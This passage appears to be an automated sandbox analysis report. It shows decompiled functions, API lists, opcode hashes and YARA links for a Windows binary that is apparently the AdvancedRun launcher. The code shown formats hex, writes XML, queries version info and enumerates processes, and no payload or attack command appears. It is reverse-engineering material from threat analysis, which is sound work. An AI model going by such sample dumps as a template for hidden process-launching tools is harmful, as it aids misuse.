                                                                                                                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                                  0x00404fe0
                                                                                                                                                                  0x00404fe9
                                                                                                                                                                  0x00405000
                                                                                                                                                                  0x00405005
                                                                                                                                                                  0x00405009
                                                                                                                                                                  0x0040500c
                                                                                                                                                                  0x0040500e
                                                                                                                                                                  0x00405015
                                                                                                                                                                  0x00405016
                                                                                                                                                                  0x00405021
                                                                                                                                                                  0x00405026
                                                                                                                                                                  0x00405027
                                                                                                                                                                  0x0040502c
                                                                                                                                                                  0x00405031
                                                                                                                                                                  0x00405039
                                                                                                                                                                  0x0040503f
                                                                                                                                                                  0x00405044
                                                                                                                                                                  0x00405048
                                                                                                                                                                  0x0040504e
                                                                                                                                                                  0x00405056
                                                                                                                                                                  0x0040505c
                                                                                                                                                                  0x0040504e
                                                                                                                                                                  0x00405065
                                                                                                                                                                  0x0040506a
                                                                                                                                                                  0x00405072
                                                                                                                                                                  0x00405079

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                                                                  0x00407d9c
                                                                                                                                                                  0x00407d9e
                                                                                                                                                                  0x00407da5
                                                                                                                                                                  0x00407db3
                                                                                                                                                                  0x00407dba
                                                                                                                                                                  0x00407dc5
                                                                                                                                                                  0x00407dc7
                                                                                                                                                                  0x00407dd0
                                                                                                                                                                  0x00407dc9
                                                                                                                                                                  0x00407dc9
                                                                                                                                                                  0x00407dc9
                                                                                                                                                                  0x00407dd8
                                                                                                                                                                  0x00407de1
                                                                                                                                                                  0x00407de5
                                                                                                                                                                  0x00407deb
                                                                                                                                                                  0x00407df2
                                                                                                                                                                  0x00407df3
                                                                                                                                                                  0x00407dfe
                                                                                                                                                                  0x00407e03
                                                                                                                                                                  0x00407e04
                                                                                                                                                                  0x00407e21

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                                                                  • <%s>, xrefs: 00407DF3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                                                                  0x00403b56
                                                                                                                                                                  0x00403b5d
                                                                                                                                                                  0x00403b6f
                                                                                                                                                                  0x00403b76
                                                                                                                                                                  0x00403b82
                                                                                                                                                                  0x00403b8d
                                                                                                                                                                  0x00403b8e
                                                                                                                                                                  0x00403b99
                                                                                                                                                                  0x00403b9e
                                                                                                                                                                  0x00403b9f
                                                                                                                                                                  0x00403ba7
                                                                                                                                                                  0x00403bb9
                                                                                                                                                                  0x00403bce
                                                                                                                                                                  0x00403be5
                                                                                                                                                                  0x00403bef
                                                                                                                                                                  0x00403bf8
                                                                                                                                                                  0x00403c00

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00403B5D
                                                                                                                                                                  • memset.MSVCRT ref: 00403B76
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT(00000000,?,00000104,?,00402FB2,0040ACC4,?,?,00000000), ref: 00404940
                                                                                                                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                                                                  • API String ID: 1832587304-479876776
                                                                                                                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                                                                  0x0040afd3
                                                                                                                                                                  0x0040afe2
                                                                                                                                                                  0x0040aff3
                                                                                                                                                                  0x0040b002
                                                                                                                                                                  0x0040b023
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b047
                                                                                                                                                                  0x0040b02e
                                                                                                                                                                  0x0040b034
                                                                                                                                                                  0x0040b03c
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                                                                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT(00000000,?,00000104,?,00402FB2,0040ACC4,?,?,00000000), ref: 00404940
                                                                                                                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                                                                  • API String ID: 393120378-2245444037
                                                                                                                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                                                                  0x004092f3
                                                                                                                                                                  0x004092fb
                                                                                                                                                                  0x00409303
                                                                                                                                                                  0x00409305
                                                                                                                                                                  0x00409310
                                                                                                                                                                  0x00409433
                                                                                                                                                                  0x00409433
                                                                                                                                                                  0x00409439
                                                                                                                                                                  0x0040943f
                                                                                                                                                                  0x00409445
                                                                                                                                                                  0x0040944b
                                                                                                                                                                  0x0040944e
                                                                                                                                                                  0x00409452
                                                                                                                                                                  0x00409466
                                                                                                                                                                  0x0040946e
                                                                                                                                                                  0x00409475
                                                                                                                                                                  0x004094f7
                                                                                                                                                                  0x004094f7
                                                                                                                                                                  0x004094f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409488
                                                                                                                                                                  0x00409494
                                                                                                                                                                  0x004094a5
                                                                                                                                                                  0x004094a9
                                                                                                                                                                  0x004094b5
                                                                                                                                                                  0x004094c3
                                                                                                                                                                  0x004094c6
                                                                                                                                                                  0x004094d5
                                                                                                                                                                  0x004094dc
                                                                                                                                                                  0x004094e1
                                                                                                                                                                  0x004094e3
                                                                                                                                                                  0x004094f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004094f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004094e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004094f7
                                                                                                                                                                  0x00409452
                                                                                                                                                                  0x00409316
                                                                                                                                                                  0x00409316
                                                                                                                                                                  0x0040931c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409322
                                                                                                                                                                  0x0040932b
                                                                                                                                                                  0x00409333
                                                                                                                                                                  0x00409337
                                                                                                                                                                  0x00409341
                                                                                                                                                                  0x00409342
                                                                                                                                                                  0x0040934e
                                                                                                                                                                  0x0040934f
                                                                                                                                                                  0x00409358
                                                                                                                                                                  0x0040935e
                                                                                                                                                                  0x0040935e
                                                                                                                                                                  0x00409363
                                                                                                                                                                  0x0040936b
                                                                                                                                                                  0x0040936d
                                                                                                                                                                  0x00409377
                                                                                                                                                                  0x00409385
                                                                                                                                                                  0x0040938d
                                                                                                                                                                  0x0040939d
                                                                                                                                                                  0x004093a5
                                                                                                                                                                  0x004093ac
                                                                                                                                                                  0x004093b4
                                                                                                                                                                  0x004093c5
                                                                                                                                                                  0x004093c9
                                                                                                                                                                  0x004093da
                                                                                                                                                                  0x004093df
                                                                                                                                                                  0x004093e5
                                                                                                                                                                  0x004093e6
                                                                                                                                                                  0x004093ea
                                                                                                                                                                  0x004093f6
                                                                                                                                                                  0x004093fc
                                                                                                                                                                  0x00409407
                                                                                                                                                                  0x00409407
                                                                                                                                                                  0x0040941d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409423
                                                                                                                                                                  0x00409428
                                                                                                                                                                  0x00409375
                                                                                                                                                                  0x00409375
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040942e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409428
                                                                                                                                                                  0x00409377
                                                                                                                                                                  0x0040936d
                                                                                                                                                                  0x004094fb
                                                                                                                                                                  0x004094ff
                                                                                                                                                                  0x004094ff
                                                                                                                                                                  0x00409337
                                                                                                                                                                  0x0040931c
                                                                                                                                                                  0x0040950f

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                                                                  • memset.MSVCRT ref: 0040938D
                                                                                                                                                                  • memset.MSVCRT ref: 0040939D
                                                                                                                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                  • memset.MSVCRT ref: 00409488
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3300951397-0
                                                                                                                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                  0x00402ed7
                                                                                                                                                                  0x00402eee
                                                                                                                                                                  0x00402ef8
                                                                                                                                                                  0x00402f00
                                                                                                                                                                  0x00402f01
                                                                                                                                                                  0x00402f05
                                                                                                                                                                  0x00402f0a
                                                                                                                                                                  0x00402f1a
                                                                                                                                                                  0x00402f30

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 19018683-0
                                                                                                                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                                                                  0x004079a4
                                                                                                                                                                  0x004079b8
                                                                                                                                                                  0x004079bd
                                                                                                                                                                  0x004079c2
                                                                                                                                                                  0x004079c5
